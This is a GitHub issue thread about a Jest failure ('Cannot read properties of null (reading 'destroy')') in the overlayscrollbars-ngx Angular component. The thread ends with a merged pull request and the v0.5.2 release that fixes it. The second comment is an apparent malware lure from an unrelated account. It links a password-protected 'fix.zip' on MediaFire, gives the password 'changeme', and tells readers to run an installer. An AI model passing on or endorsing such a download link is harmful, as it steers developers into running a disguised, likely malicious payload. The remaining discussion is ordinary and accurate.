### ISSUE TITLE
Jest: Cannot read properties of null (reading 'destroy')

### ISSUE THREAD

**Issue by de-don** [KingSora/OverlayScrollbars#670]
This code fails in jest tests because of `!`. Instance not initialized yet, but angular tries to destory component, and this is raises and error

https://github.com/KingSora/OverlayScrollbars/blob/b11536b47b3a67b5a3d169c7fc3a98fda1602acd/packages/overlayscrollbars-ngx/src/overlayscrollbars.component.ts#L100

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by de-don** [comment]
Fix in pull request https://github.com/KingSora/OverlayScrollbars/pull/671

**Comment by KingSora** [comment]
@de-don I've merged your PR and will release a new version with the fix soon

**Comment by de-don** [comment]
@KingSora Hi, could you please tell me, when new version will be released?

thanks :)

**Comment by KingSora** [comment]
@de-don I've just published `overlayscrollbars-ngx` [v0.5.2](https://www.npmjs.com/package/overlayscrollbars-ngx/v/0.5.2) :)

**Comment by de-don** [comment]
It solved the problem, thank you!
